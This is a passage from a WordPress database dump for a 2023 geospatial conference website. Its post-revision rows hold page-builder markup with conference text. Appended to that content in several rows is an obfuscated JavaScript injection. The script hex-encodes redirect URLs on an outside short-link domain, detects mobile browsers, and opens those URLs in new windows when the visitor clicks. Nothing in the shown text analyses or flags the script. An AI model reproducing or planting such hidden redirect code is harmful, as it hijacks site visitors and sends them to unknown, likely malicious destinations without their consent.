)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 22:27:04','2022-11-08 22:27:04','',3066,'https://gsw2023.com/?p=3096',0,'revision','',0),
(3097,1,'2022-11-08 22:28:00','2022-11-08 22:28:00','','m2','','inherit','open','closed','','m2-6','','','2022-11-08 22:28:00','2022-11-08 22:28:00','',3066,'https://gsw2023.com/wp-content/uploads/2022/11/m2-1.jpg',0,'attachment','image/jpeg',0),
(3098,1,'2022-11-08 22:30:47','2022-11-08 22:30:47','','m2','','inherit','open','closed','','m2-7','','','2022-11-08 22:30:47','2022-11-08 22:30:47','',3066,'https://gsw2023.com/wp-content/uploads/2022/11/m2-2.jpg',0,'attachment','image/jpeg',0),
(3099,1,'2022-11-08 22:36:41','2022-11-08 22:36:41','[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"0\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" icon_style=\"square\" content_font_family=\"font_family:Raleway|font_call:Raleway|variant:regular\" content_font_style=\"font-weight:normal;font-style:normal;\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 22:36:41','2022-11-08 22:36:41','',3066,'https://gsw2023.com/?p=3099',0,'revision','',0),
(3100,1,'2022-11-08 22:37:11','2022-11-08 22:37:11','[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 